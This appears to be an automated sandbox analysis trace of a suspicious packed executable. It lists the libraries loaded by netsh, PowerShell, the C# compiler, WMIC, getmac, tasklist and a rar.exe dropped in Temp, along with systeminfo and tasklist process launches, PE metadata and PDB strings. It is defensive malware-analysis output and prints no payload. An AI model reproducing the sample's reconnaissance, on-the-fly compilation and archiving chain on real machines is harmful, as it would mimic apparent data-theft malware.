Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\tree.com | Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com | Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: e45AiBoV6X.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: e45AiBoV6X.exeStatic file information: File size 6146615 > 1048576
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: e45AiBoV6X.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: e45AiBoV6X.exe, 00000001.00000002.1995160650.00007FFE1025B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997954782.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: e45AiBoV6X.exe, 00000001.00000002.1996506357.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: e45AiBoV6X.exe
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: e45AiBoV6X.exe, e45AiBoV6X.exe, 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: e45AiBoV6X.exe, 00000001.00000002.1992435238.00007FFDFB77F000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997119035.00007FFE126C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997695526.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: e45AiBoV6X.exe, 00000001.00000002.1994462832.00007FFE0EC41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: e45AiBoV6X.exe, 00000001.00000002.1994882993.00007FFE101D1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: e45AiBoV6X.exe, 00000001.00000002.1995160650.00007FFE1025B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: \bx.pdb source: powershell.exe, 00000025.00000002.1868678671.00000296ED014000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000041.00000000.1882689611.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.pdb source: powershell.exe, 00000025.00000002.1843488107.0000029680385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: e45AiBoV6X.exe, 00000000.00000003.1716520142.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1997442294.00007FFE126F1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: e45AiBoV6X.exe, 00000001.00000002.1996803109.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
